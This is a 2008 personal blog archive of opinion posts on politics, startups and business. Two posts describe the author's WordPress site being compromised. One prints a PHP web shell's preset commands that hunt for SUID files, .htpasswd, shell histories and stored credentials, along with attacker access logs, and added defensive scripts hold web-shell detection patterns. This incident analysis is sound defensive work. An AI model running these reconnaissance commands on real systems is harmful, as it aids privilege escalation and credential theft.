
Economics are not Toys

May 16th, 2008 by sean

In a misguided move to try and control the cost of gas, the U.S. government is going to halt deliveries to the strategic oil reserve. The theory goes that the oil that would have gone into the reserve will now increase supply among other distribution channels and help meet demand, bringing prices down.

Why is this move misguided? These deliveries are only “one tenth of one percent” of oil on the market. It provides the illusion of help without any real chance of help.

Unfortunately the biggest reason this is the wrong move is that a move was made at all. Once again the U.S. government is showing it’s willing to actively keep gas prices low while failing to commit to alternative energy sources. This behavior forces the longer term energy strategy of the U.S. to rely on foreign energy reserves as it’s the lowest risk option. Leaders in government will then claim that drilling in Alaska is unavoidable, when in reality there was a completely different path to be taken.

The best move the U.S. government could have made in the face of rising petroleum prices is an indication that no moves will be made to try and lower the price artificially. This would force industry to focus on alternative energy sources and help us start to alleviate our dependence on foreign oil. If you look at the energy mix of other developed countries, policies promoting alternative sources have had a major impact.

The abundance of cheap energy and food enjoyed in the U.S. is at an end. Either the government can commit to a sound long term strategy or cling to the status quo. The choice will determine if the U.S. is still a world leader in 50 years.


Playing Politics

May 14th, 2008 by sean

John Edwards endorsed Barack Obama for President today. If that surprises you - it should. The news was rather sudden considering both Barack and Hillary have been courting John since he dropped out of the race. It seems that the inevitability of Barack’s nomination pushed him over the top and Mr. Edwards decided to join the winning team.

Why now, though? Why not wait until after the primary season is over? Waiting would allow him to maintain good standing with the Clintons. The obvious answer is that it would be too late for his endorsement to mean anything. The currency he has right now is the limited success he had in the primary himself, and once the primary is over he becomes yet another senior member of the Democratic party. That means less exposure for him, as well as a longer road to a Vice President nomination. Now that the winner is all but assured it’s safe for him to endorse Barack without the fear of picking the wrong side.

A less obvious answer is that he is trying out for the Vice President’s spot. Barack has well-documented difficulties with the white working class vote, which was John Edwards’ base before he dropped out and Hillary claimed it. Endorsing Barack now gives Obama a rare chance to see if it affects his performance in the few remaining Democratic primaries. In essence, Obama gets to test out the John Edwards effect.

If Obama performs better among working class white voters because of John Edwards’ help in the final few contests, expect John to be Obama’s choice for VP. If not, he may look elsewhere.

All Good Things

May 8th, 2008 by sean

Jangl, once a high-flier in the world of “Voice 2.0”/widgets/social media, has met an unfortunate end and is in the process of selling off its assets. The founding team has found a new home in the business development group of Jajah where they can continue the pursuit of Voice 2.0.

I’ve met Michael (founder & CEO) who is both a great guy and a solid entrepreneur. I remain impressed at the series of deals he lined up for Jangl, knowing how hard it is to get those off the ground at a startup. Unfortunately, none of it was enough to overcome the odds.

As much as we try and delude ourselves here in Silicon Valley, the chances of any given startup succeeding - regardless of the skill of the team, the deals they put in place or their technology - are very low. For every huge acquisition by Google there are probably 50 other companies that tried the same thing but couldn’t make it work. Because of those overwhelming odds, SV startups often redefine success to make it seem more likely. Many companies celebrate venture funding, for example, and brag about the many millions of dollars they’ve raised.

Venture funding is a poor indicator of success, as the most successful companies raise the least and the more you raise the less likely you are to ever exit. Venture funding can also be a curse, as it seems that the core of the meltdown at Jangl was a disagreement between the investors and management. Venture capitalists are in the business to make money, not to make their startups successful - never forget that.

The best you can do after encountering failure in the startup space is to try again. I’m glad to see the Jangl team jumping right back in as part of another effort and I hope that it leads them to success. The chances are still against them, but luckily that never stops us from trying.

Philosopher Kings

May 6th, 2008 by sean

Marc Andreessen has a great post up on his blog (subscribe if you don’t already) describing the benefits of dual-class stock structures for public technology companies. Dual-class structures are where one class of shares (Class B) has more voting power than another class (Class A) even if Class A is numerically larger than Class B. It’s a way for a minority to control management of the company, while sharing the financial upside with a larger group.

In some cases, as Marc points out, this can be a good thing as it can help the founding management avoid the distractions of Wall St. In fact, you need to look no further than Google or Warren Buffett to find examples of such a stock structure providing great benefits to their shareholders.

Unfortunately, this all strikes me as remarkably similar to the classical argument for Philosopher Kings. The concept of a “Philosopher King” was proposed by Plato in Book VII of The Republic and argues that the ideal governmental structure is an enlightened king (philosopher herein defined as someone focused on acquiring wisdom). An underlying argument is that the populace of the city-state ruled by the Philosopher King lacked the ability to perceive wisdom in the same way as a philosopher and were thus incapable of understanding how to rule.

With that in mind, according to Marc these are the preconditions necessary for a dual-class stock structure to be successful:

  • The key leaders of the company — typically the founders — who will own the controlling Class B shares, are also major economic shareholders in the company. They own a significant portion of the company and are therefore highly incented to maximize the value of the company over time.
  • The key leaders of the company who own the controlling Class B shares have a long-term goal of building a major franchise, and the commitment required to execute against that goal.
  • The controlling Class B shareholders have a commitment to treat Class A shareholders fairly and equally in all respects other than voting power.
  • All public shareholders understand what they are getting into up front — no bait and switch.

Points 2 and 3 are the key problems here, as they strike me as being as idealistic as Plato’s original proposal. In reality, there never were (or will be) true Philosopher Kings. Unfortunately the closest we’ve come is Enlightened Absolutism or Benevolent Dictators (depending on how nice you want to be). That is because no single person can objectively weigh and govern to maximize the interests of all interested parties, especially if they are an involved party themselves.

Even if you were to fashion an ideal ruler, what happens when that ruler dies and passes their rule on to their children? That’s exactly the problem that plagued the NY Times, which had a dual-class stock structure giving voting control to the members of the Ochs-Sulzberger family. Does that mean that when the founders or original management move on you remove the Class B stock structure? Good luck with that: whoever inherits that stock controls the company and they will make that decision.

Maybe the saving grace of dual-class stock structures is Marc’s point #4 which is that they are well known to potential investors, so everyone knows what they are getting: a chance to bet on a few people. Because unlike most companies, those people aren’t accountable to anyone else.

Microsoft’s Gift to Yahoo!

May 3rd, 2008 by sean

I’m sure you’ve read by now that Microsoft withdrew its bid for Yahoo!. Depending on whom you listen to this is either because Jerry Yang was stubborn, Steve Ballmer is unstable or the real challenges to getting a deal done (regulatory, cultural, financial) became apparent over the past few weeks.

So, what happens next?

  • Yahoo!’s stock will drop back into the teens, where it lived before the offer.
  • Microsoft will go back to trying to figure out how to sell Vista, improve sales on the Xbox 360 and deal with more half-baked ideas like the Zune.
  • Yahoo! will continue with its open initiative and try and use it to generate revenue growth so that Jerry Yang doesn’t get both fired and sued by the shareholders.
  • Microsoft will claim its Live strategy is working online as they continue to lose to Google.

Interestingly, Microsoft did give Yahoo! something even after walking away from the deal: a real sense of urgency. Speaking to anyone at Yahoo! before the offer you would learn that they knew they would have trouble staying independent unless they turned things around, but lacked the organizational urgency to make things happen. Microsoft steps in with Yahoo!’s greatest fear and all of a sudden Yahoo! is more prolific in 4 months than it was in 2 years. Yahoo! unveiled their open platform initiative and moved Open Search (Search Monkey) into beta in just a few months. They pushed hard in mobile, both expanding the reach of Go and announcing innovations like oneConnect and onePlace.

Even Jerry Yang, with his storied history at Yahoo!, got bogged down in the toxic corporate culture that had developed during Terry Semel’s reign. An inexperienced executive, Jerry lacked the ability to instill the necessary urgency to get things done on his own. Steve Ballmer did him a favor and scared the hell out of his company. Now it’s up to Yang & Co. to see if they can do anything with it. If not, expect Microsoft to come back again at a lower price. That is probably even more motivation for Yahoo! to deliver.

30

April 24th, 2008 by sean

One of the great things about blogging is that I can go back and revisit different points in my life and remember what I was thinking about back then. That might seem silly, but I think about a lot of different things and often forget about the context of events. The color fades on the annals of my memory, so to speak.

On March 31 I turned 30, or graduated from my twenties depending on whether you’re a glass half-full or half-empty person. At the time I was ambivalent as I tend to be happy in the here and now, so the numeric value of my age doesn’t really bother me. Surprisingly, a lot of people I know had a tough time dealing with that number and the corresponding realization that we’re not young anymore.

Today, I went back to revisit my posting from last year’s birthday when I turned 29 (read it yourself here). My first thought on reading it was that maybe I’m not a horrible blogger after all. My second thought, more useful, was that I’m glad I was so happy back then.

So, instead of more lists or witty observations, I merely hope that next year at this time I’ll be writing another happy post about how great the previous year has been. With any luck, I’ll make this a habit every year until I wake up one day and realize that I’ve had a wonderful life.

Because, in the end, that’s really what I hope for.

Book Review: Gang Leader for a Day

April 21st, 2008 by sean

First, you have to admit that Gang Leader for a Day from Sudhir Venkatesh has a great title. It’s one of those titles that makes you want to read the book regardless of what it’s about. I’m going to go out on a limb and say that the title alone probably sold 30% of the copies of this book. The other 70% were sold because Sudhir was mentioned in Freakonomics.

The good news is that the book itself lives up to the promise of the title. Sudhir was in fact invited to be a gang leader for a day back in the 1980s when he was a graduate student in sociology at the University of Chicago studying the economics of a crack gang. The story is told biographically instead of as a study, which makes the entire story extremely personal and answers all those questions that you have: How did he get mixed up in crack gangs? What does it mean to be a gang leader? What is being in a gang really like? The story reads more like a novel than a recounting of actual events, so I suspect that some liberties were taken to get the desired result. Even so, the content is engaging.

If you like sociology and are curious how gangs work from the inside, I encourage you to pick it up.

WordPress 2.5

April 6th, 2008 by sean

If you’ve been wondering where this blog has been for the past few days, it was hacked AGAIN. I sent a detailed email to the WordPress security team describing the attack and got this in return:

WP 2.1.2 is a really old version of WordPress and there are multiple exploits for it. You should upgrade to 2.3.3 as soon as possible and change the passwords on all your accounts!

No kidding, really? I mean, seriously, that is weak. There is clearly something going on across the WordPress community where blogs are being compromised with these new attacks. Playing dumb does not help.

Anyway, I took the blog down for a while until I had the time to upgrade to 2.5. We’re now upgraded and back in action. Hopefully still irreverent. Mildly safer from attacks if the above email represents the best of WordPress security.

NOTE: If you do upgrade to fix the attack, note that the worm installs a hidden plugin that includes links in the footer of every page. You have to go into the database and remove the plugin from the list of active plugins, or else it’ll still be there when you upgrade as well. Check ‘active_plugins’ in the options table (wp_options with the default table prefix).
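Here is how I would do that check in a script rather than by eye. This is an added example, not part of the original post and not WordPress’s own code: WordPress stores ‘active_plugins’ as a PHP-serialized array of file paths relative to wp-content/plugins, so the script parses that format, drops any entry that escapes the plugin directory, is not a .php file, or (when given the plugin directory) does not exist on disk, and prints the UPDATE that writes the cleaned value back. The sample option value, its ‘../uploads/.cache/x.php’ entry and the wp_ table prefix are constructed for the demo.

```python
"""Inspect a WordPress `active_plugins` option value for entries that should not be there."""
import os
import re

# Constructed sample value (hypothetical; not taken from the post). Fetch the real one with:
#   SELECT option_value FROM wp_options WHERE option_name = 'active_plugins';
SAMPLE_ACTIVE_PLUGINS = (
    'a:3:{i:0;s:19:"akismet/akismet.php";'
    'i:1;s:9:"hello.php";'
    'i:2;s:23:"../uploads/.cache/x.php";}'
)


def php_unserialize_string_array(blob):
    """Parse a PHP-serialized array of strings, the shape WordPress uses for active_plugins.

    Only the `a:N:{i:K;s:L:"...";...}` form is handled; anything else raises ValueError.
    PHP counts string lengths in bytes, so the work is done on the UTF-8 encoding.
    """
    data = blob.encode('utf-8')
    m = re.match(rb'a:(\d+):\{', data)
    if not m:
        raise ValueError('not a serialized PHP array')
    count, pos = int(m.group(1)), m.end()
    element = re.compile(rb'i:\d+;s:(\d+):"')
    items = []
    for _ in range(count):
        m = element.match(data, pos)
        if not m:
            raise ValueError('unexpected element at offset %d' % pos)
        length, start = int(m.group(1)), m.end()
        value = data[start:start + length]
        pos = start + length
        if data[pos:pos + 2] != b'";':
            raise ValueError('string length mismatch at offset %d' % pos)
        pos += 2
        items.append(value.decode('utf-8'))
    if data[pos:pos + 1] != b'}':
        raise ValueError('unterminated array')
    return items


def php_serialize_string_array(items):
    """Inverse of the parser, so a cleaned list can be written back with UPDATE wp_options."""
    parts = ['a:%d:{' % len(items)]
    for i, s in enumerate(items):
        parts.append('i:%d;s:%d:"%s";' % (i, len(s.encode('utf-8')), s))
    parts.append('}')
    return ''.join(parts)


def suspicious_plugins(items, plugin_dir=None):
    """Return entries that cannot be a legitimate plugin file.

    Flags: a path escaping the plugin directory ('..' or absolute), a non-.php target and,
    when plugin_dir is given, a file that does not exist on disk (the option can point at a
    file dropped somewhere else entirely, e.g. under the uploads directory).
    """
    bad = []
    for p in items:
        norm = os.path.normpath(p).replace('\\', '/')
        if p.startswith('/') or norm.startswith('..') or not p.endswith('.php'):
            bad.append(p)
        elif plugin_dir is not None and not os.path.isfile(os.path.join(plugin_dir, p)):
            bad.append(p)
    return bad


def clean_active_plugins(blob, plugin_dir=None):
    """Parse, drop the suspicious entries and return (serialized_clean_value, dropped)."""
    items = php_unserialize_string_array(blob)
    dropped = suspicious_plugins(items, plugin_dir)
    keep = [p for p in items if p not in dropped]
    return php_serialize_string_array(keep), dropped


if __name__ == '__main__':
    cleaned, dropped = clean_active_plugins(SAMPLE_ACTIVE_PLUGINS)
    print('dropped:', dropped)
    print("UPDATE wp_options SET option_value = '%s' WHERE option_name = 'active_plugins';" % cleaned)
```

Pass the real wp-content/plugins path as plugin_dir so the on-disk check runs, and only apply the UPDATE after looking at what was dropped. WordPress unserializes this value on every request, so the byte lengths in the rewritten string have to be exact; that is why the serializer mirrors the parser instead of building the string by hand.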

3rbsmag

March 27th, 2008 by sean

So I just posted to my blog and couldn’t figure out why the page didn’t look quite right. The image I included in the post along with the sidebar widgets did not appear, which was strange. Equally strange was that when I logged into the WordPress console all plugins were turned off, including Akismet, which means that had I allowed commenting without approvals my blog would have been overrun. My blog got hacked.

The culprit seems to be something called 3rbsmag, which can do some nasty things to your machine if you let it run PHP files. The attack, as far as I can tell, starts with a WordPress vulnerability that allows it to gain access to the admin panel. It then turns off all plugins (and hence all protection) while changing the “uploads” directory to the tmp directory on your server. It then uploads two files, both PHP scripts, which do some nasty things to your server. You can download the scripts below, just don’t accidentally run them as PHP locally:

3rbsmag.txt

3rbsmag1.txt

You can tell what it’s up to from this very simple part of the code:

    if (!$win){
        $cmdaliases = array(
            array("-----------------------------------------------------------", "ls -la"),
            array("find all suid files", "find / -type f -perm -04000 -ls"),
            array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
            array("find all sgid files", "find / -type f -perm -02000 -ls"),
            array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
            array("find config.inc.php files", "find / -type f -name config.inc.php"),
            array("find config* files", "find / -type f -name \"config*\""),
            array("find config* files in current dir", "find . -type f -name \"config*\""),
            array("find all writable folders and files", "find / -perm -2 -ls"),
            array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
            array("find all service.pwd files", "find / -type f -name service.pwd"),
            array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
            array("find all .htpasswd files", "find / -type f -name .htpasswd"),
            array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
            array("find all .bash_history files", "find / -type f -name .bash_history"),
            array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
            array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
            array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
            array("list file attributes on a Linux second extended file system", "lsattr -va"),
            array("show opened ports", "netstat -an | grep -i listen")
        );
    }
    else
    {
        $cmdaliases = array(
            array("-----------------------------------------------------------", "dir"),
            array("show opened ports", "netstat -an")
        );
    }

Basically, this is the preset command menu of a web shell. On a Windows box it offers little more than a directory listing and a dump of open ports, but on a *nix machine it hands whoever loads the page one-click searches for SUID and SGID binaries, config files, .htpasswd and service.pwd files, shell histories and fetchmail credentials, everything needed to move from the web server account to the rest of the box. In other words, it downloads your life.

As far as I can tell, if these PHP files were at all accessible they would give the person visiting the page unfettered access to most of your system. I could use some help analyzing it, so please feel free to help in the comments.

If you notice my system is compromised, please let me know. ;)
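To find dropped scripts like these without reading every file by hand, here is an added example scanner (my code, not the author’s and not part of the original post). It walks a web root, treats anything that ends in .php or contains a PHP open tag as PHP (an attacker can give a script any extension, so the tag matters more than the name), scores the source against a few indicators (two strings lifted from the snippet above, the rest generic shell primitives such as passthru() on request input or eval(base64_decode())), and flags anything that scores above a threshold or sits in a directory that should never hold executable code (uploads, tmp, cache). The sample tree, the weights and the threshold are constructed for the demo and are my assumptions.

```python
"""Hunt for dropped PHP shells like the 3rbsmag scripts: walk a tree and score PHP content."""
import os
import re
import shutil
import tempfile

# Indicators: the first two strings come from the shell snippet in the post, the rest are
# generic web-shell primitives. The weights are my own choice, not anything from the post.
INDICATORS = [
    (r'\$cmdaliases', 5),
    (r'find / -type f -perm -0?4000', 5),
    (r'\b(?:passthru|shell_exec|system|proc_open|popen)\s*\(', 2),
    (r'\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(', 4),
    (r'\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*[\'"](?:cmd|c|exec|command)[\'"]\s*\]', 3),
    (r'move_uploaded_file\s*\(', 1),
]
COMPILED = [(re.compile(p, re.I), w) for p, w in INDICATORS]
PHP_OPEN = re.compile(r'<\?(?:php|=)', re.I)


def score_php_source(text):
    """Return (score, matched_patterns) for a blob of PHP source."""
    score, hits = 0, []
    for rx, w in COMPILED:
        if rx.search(text):
            score += w
            hits.append(rx.pattern)
    return score, hits


def scan_tree(root, threshold=4, quarantine_dirs=('uploads', 'tmp', 'cache')):
    """Walk `root`; report files that score >= threshold or are PHP living in a directory
    that should only ever contain data (uploads, tmp, cache)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, 'rb') as fh:
                    text = fh.read(512 * 1024).decode('latin-1')  # never choke on binary junk
            except OSError:
                continue
            if not (name.lower().endswith(('.php', '.phtml', '.php5')) or PHP_OPEN.search(text)):
                continue
            rel = os.path.relpath(path, root).replace('\\', '/')
            in_quarantine = any(part in quarantine_dirs for part in rel.split('/')[:-1])
            score, hits = score_php_source(text)
            if score >= threshold or in_quarantine:
                findings.append({'path': rel, 'score': score, 'hits': hits,
                                 'odd_location': in_quarantine})
    return sorted(findings, key=lambda f: -f['score'])


def demo_tree():
    """Build a constructed sample tree (hypothetical files, not the author's) and scan it."""
    root = tempfile.mkdtemp()
    layout = {
        'blog/wp-content/plugins/akismet/akismet.php':
            '<?php /* normal plugin code */ function akismet_init() {} ?>',
        'blog/wp-content/uploads/3rbsmag.txt':
            '<?php $cmdaliases = array(array("find all suid files", "find / -type f -perm -04000 -ls"));'
            ' passthru($_REQUEST["cmd"]); ?>',
        'tmp/x.php': '<?php eval(base64_decode($_POST["c"])); ?>',
        'blog/index.php': '<?php require("./wp-blog-header.php"); ?>',
    }
    try:
        for rel, body in layout.items():
            full = os.path.join(root, *rel.split('/'))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'w') as fh:
                fh.write(body)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == '__main__':
    for f in demo_tree():
        print('%-40s score=%2d odd_location=%s hits=%s'
              % (f['path'], f['score'], f['odd_location'], f['hits']))
```

Point scan_tree at the document root and at the server’s tmp directory (the attack above changed the upload path to tmp, so the dropped files may not be under the web root at all). Treat the score as triage, not proof: a legitimate backup plugin will trip move_uploaded_file(), and a minified obfuscated shell may trip nothing, which is why location is a separate signal.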

UPDATE 3/27 @ 11:44pm

I’ve continued digging and found the access logs that correspond to the attacks. It looks like my server was hit twice - once on Sunday, March 23, 2008, 12:58:44 AM and once on Monday, March 24, 2008, 7:59:49 PM as those were the times the two 3rbsmag files were created. Below are the server logs from that time period, and you’ll notice the same IP address is responsible for both:

207.210.112.209 - - [23/Mar/2008:00:58:42 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1252
207.210.112.209 - - [23/Mar/2008:00:58:43 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 302 432
207.210.112.209 - - [23/Mar/2008:00:58:43 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1160
207.210.112.209 - - [23/Mar/2008:00:58:44 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 -
207.210.112.209 - - [23/Mar/2008:00:58:46 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1232
207.210.112.209 - - [23/Mar/2008:00:58:46 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 302 432
207.210.112.209 - - [23/Mar/2008:00:58:47 -0700] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1174
207.210.112.209 - - [23/Mar/2008:07:17:52 -0700] "POST /blog/?23dfeefd3sf2c HTTP/1.1" 200 7
207.210.112.209 - - [23/Mar/2008:13:50:38 -0700] "HEAD /blog/wp-admin/ HTTP/1.1" 200 -
207.210.112.209 - - [24/Mar/2008:19:59:47 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1252
207.210.112.209 - - [24/Mar/2008:19:59:48 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 302 432
207.210.112.209 - - [24/Mar/2008:19:59:48 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1160
207.210.112.209 - - [24/Mar/2008:19:59:49 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 -
207.210.112.209 - - [24/Mar/2008:19:59:50 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1232
207.210.112.209 - - [24/Mar/2008:19:59:51 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 302 432
207.210.112.209 - - [24/Mar/2008:19:59:52 -0700] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1174
207.210.112.209 - - [25/Mar/2008:05:01:36 -0700] "POST /blog/?23dfeefd3sf2c HTTP/1.1" 200 7
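The same pattern can be picked out of a log automatically. As an added example (not from the original post), here is a small Python detector run over the lines above plus one constructed benign request: the same client POSTing to wp-admin/options.php, then to wp-admin/upload.php with post_id=-1, then fetching wp-admin/upgrade.php, all inside a 30-second window, matches the sequence of changing the upload settings, dropping a file and putting the settings back described earlier. It also collects the later short POSTs to /blog/?<token> (200 with a 7-byte body) from the same address, which read to me like check-ins to whatever was dropped. The window size, the beacon pattern and the benign 10.0.0.5 line are my assumptions.

```python
"""Flag the WordPress admin-abuse sequence visible in the access log above."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Lines copied from the log excerpt in the post (Apache common log format);
# the last line is a constructed benign request from another address.
LOG_LINES = [
    '207.210.112.209 - - [23/Mar/2008:00:58:42 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1252',
    '207.210.112.209 - - [23/Mar/2008:00:58:43 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 302 432',
    '207.210.112.209 - - [23/Mar/2008:00:58:43 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1160',
    '207.210.112.209 - - [23/Mar/2008:00:58:44 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 -',
    '207.210.112.209 - - [23/Mar/2008:00:58:46 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1232',
    '207.210.112.209 - - [23/Mar/2008:00:58:46 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 302 432',
    '207.210.112.209 - - [23/Mar/2008:00:58:47 -0700] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1174',
    '207.210.112.209 - - [23/Mar/2008:07:17:52 -0700] "POST /blog/?23dfeefd3sf2c HTTP/1.1" 200 7',
    '207.210.112.209 - - [23/Mar/2008:13:50:38 -0700] "HEAD /blog/wp-admin/ HTTP/1.1" 200 -',
    '207.210.112.209 - - [24/Mar/2008:19:59:47 -0700] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1252',
    '207.210.112.209 - - [24/Mar/2008:19:59:48 -0700] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1160',
    '207.210.112.209 - - [24/Mar/2008:19:59:52 -0700] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1174',
    '207.210.112.209 - - [25/Mar/2008:05:01:36 -0700] "POST /blog/?23dfeefd3sf2c HTTP/1.1" 200 7',
    '10.0.0.5 - - [24/Mar/2008:20:00:00 -0700] "GET /blog/ HTTP/1.1" 200 8123',  # constructed benign line
]

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
# Assumed shape of the check-in requests: a bare query string of 8+ alphanumerics on the blog root.
BEACON_RE = re.compile(r'/blog/\?[0-9a-z]{8,}')


def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    return rec


def find_admin_abuse(lines, window=timedelta(seconds=30)):
    """One finding per (client, burst): POST options.php, POST upload.php?post_id=-1 and
    GET upgrade.php from the same address within `window`, plus any later beacon-like POSTs."""
    by_ip = defaultdict(list)
    for raw in lines:
        rec = parse_line(raw)
        if rec:
            by_ip[rec['ip']].append(rec)
    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r['ts'])
        skip_until = None  # avoid re-reporting the same burst for every options.php POST in it
        for i, r in enumerate(recs):
            if skip_until is not None and r['ts'] <= skip_until:
                continue
            if not (r['method'] == 'POST' and r['path'].endswith('/wp-admin/options.php')):
                continue
            burst = [x for x in recs[i:] if x['ts'] - r['ts'] <= window]
            got_upload = any(x['method'] == 'POST' and '/wp-admin/upload.php' in x['path']
                             and 'post_id=-1' in x['path'] for x in burst)
            got_upgrade = any('/wp-admin/upgrade.php' in x['path'] for x in burst)
            if got_upload and got_upgrade:
                beacons = sorted({x['path'] for x in recs
                                  if x['ts'] > r['ts'] and x['method'] == 'POST'
                                  and BEACON_RE.fullmatch(x['path']) and x['size'] < 64})
                findings.append({'ip': ip, 'start': r['ts'], 'requests': len(burst),
                                 'beacons': beacons})
                skip_until = r['ts'] + window
    findings.sort(key=lambda f: f['start'])
    return findings


if __name__ == '__main__':
    for f in find_admin_abuse(LOG_LINES):
        print('%s  %s  %d requests  beacons=%s' % (f['start'].isoformat(), f['ip'],
                                                    f['requests'], f['beacons']))
```

Run it over the full access log rather than the excerpt; the two findings it produces here (one per night) line up with the creation times of the two 3rbsmag files. A legitimate admin can also hit options.php and upload.php in quick succession, so the beacon list and the status/size pattern are what separate an attack from someone editing settings.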

Who owns that IP address you ask? Thanks to the wonders of ARIN we find that it’s registered to:

OrgName:    Global Net Access, LLC
OrgID:      GNAL-2
Address:    1100 White St SW
City:       Atlanta
StateProv:  GA
PostalCode: 30310

Which means we still don’t really know who it is, as Global Net Access is an ISP. I will keep investigating.

Friendly Feeds

March 27th, 2008 by sean

Being the lemming that I am, I signed up for FriendFeed yesterday and created a meta-feed of all my social media activities. You should all subscribe to it. It’s very exciting, currently the most important destination on the web.

Seriously, I do think that FriendFeed is onto something. Twitter was attractive because it let you easily post what you were up to in a common location people could check. Unfortunately, it’s very hard to maintain that level of documentation, so inevitably your posting drops off and then no one has any idea what you’re up to. By automating the process of action recording, FriendFeed remedies this problem as it takes no additional effort to tell someone what you’re up to - you can even pepper it with Twitter updates to provide color.

I actually asked for a service just like FriendFeed last April (see here), and I’m surprised it took a year as the service is pretty simple. Unfortunately it’s given me an interesting problem. Below is a graph of all my social media outlets, with arrows representing where the RSS feeds are republished between the outlets.

Social Media Graph

As you can see, my blog gets republished on Facebook and FriendFeed, while Twitter and Delicious make it both to Tumblr and FriendFeed. Unfortunately that means I can’t feed Tumblr into FriendFeed without creating duplicates and FriendFeed can’t feed into Facebook. I know what you’re thinking: “Why not just cut out the dupes by choosing one aggregation point?” Think you’re so smart, don’t you. Clearly it’s far too complex of a problem for me to tackle so I’m just going to leave things as is.

So, now I need another service. I need something that helps me visualize the flow of my social media since it’s quickly getting out of hand. I’ll look forward to seeing it in April 2009.